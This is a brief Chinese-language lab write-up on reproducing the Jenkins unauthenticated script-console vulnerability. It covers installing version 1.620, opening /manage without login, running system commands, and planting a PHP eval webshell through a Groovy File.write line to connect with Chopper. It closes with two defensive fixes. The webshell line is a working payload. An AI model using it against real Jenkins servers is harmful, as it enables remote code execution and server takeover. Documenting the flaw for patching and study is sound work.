jenkins未授權訪問漏洞
一、漏洞描述
未授權訪問管理控制台,可以通過腳本命令行執行系統命令。通過該漏洞,可以后台管理服務,通過腳本命令行功能執行系統命令,如反彈shell,wget寫webshell文件。
二、漏洞環境搭建
1、官方下載jenkins-1.620-1.1.noarch.rpm,下載地址:http://mirrors.jenkins.io
2、在redhat安裝jenkins
rpm -ivh jenkins-1.620-1.1.noarch.rpm
3、開啟jenkins服務
4、瀏覽器訪問http://192.168.10.137:8080,如下圖所示說明環境搭建成功
三、漏洞復現
1、瀏覽器訪問http://192.168.10.137:8080/manage,可以看到沒有做任何限制,可以直接訪問
2、點擊”腳本命令行”
3、執行系統命令,下圖看到成功執行系統命令
4、利用”腳本命令行”上傳webshell,內容如下:
new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');
5、點擊“運行”,沒有報錯,上傳成功
6、菜刀連接
四、漏洞防御
1、對后台控制頁面做登錄驗證限制
2、升級版本